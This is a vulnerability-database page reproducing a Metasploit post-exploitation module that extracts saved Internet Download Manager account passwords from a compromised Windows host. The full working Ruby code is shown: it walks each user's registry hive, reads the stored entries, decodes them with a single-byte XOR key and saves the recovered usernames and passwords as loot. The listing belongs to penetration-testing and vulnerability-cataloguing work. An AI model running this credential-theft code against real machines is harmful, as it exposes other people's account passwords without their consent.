Lucene search
K

Windows Gather Internet Download Manager (IDM) Password Extractor

🗓️ 10 Aug 2011 17:48:30Reported by sil3ntdre4m <[email protected]>, UnknownType 
metasploit
 metasploit
🔗 www.rapid7.com👁 32 Views

Windows Gather Internet Download Manager (IDM) Password Extractio

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',
        'Description' => %q{
          This module recovers the saved premium download account passwords from
          Internet Download Manager (IDM). These passwords are stored in an encoded
          format in the registry. This module traverses through these registry entries
          and decodes them. Thanks to the template code of theLightCosine's CoreFTP
          password module.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  def run
    creds = Rex::Text::Table.new(
      'Header' => 'Internet Downloader Manager Credentials',
      'Indent' => 1,
      'Columns' =>
      [
        'User',
        'Password',
        'Site'
      ]
    )

    registry_enumkeys('HKU').each do |k|
      next unless k.include? 'S-1-5-21'
      next if k.include? '_Classes'

      print_status("Looking at Key #{k}")

      begin
        subkeys = registry_enumkeys("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\")
        if subkeys.nil? || subkeys.empty?
          print_status('IDM not installed for this user.')
          return
        end

        subkeys.each do |site|
          user = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'User')
          epass = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'EncPassword')
          next if epass.nil? || (epass == '')

          pass = xor(epass)
          print_good("Site: #{site} (User=#{user}, Password=#{pass})")
          creds << [user, pass, site]
        end

        print_status('Storing data...')
        path = store_loot(
          'idm.user.creds',
          'text/csv',
          session,
          creds.to_csv,
          'idm_user_creds.csv',
          'Internet Download Manager User Credentials'
        )
        print_good("IDM user credentials saved in: #{path}")
      rescue ::Exception => e
        print_error("An error has occurred: #{e}")
      end
    end
  end

  def xor(ciphertext)
    pass = ciphertext.unpack('C*')
    key = 15
    for i in 0..pass.length - 1 do
      pass[i] ^= key
    end
    return pass.pack('C*')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 13:47Current
7.2High risk
Vulners AI Score7.2
32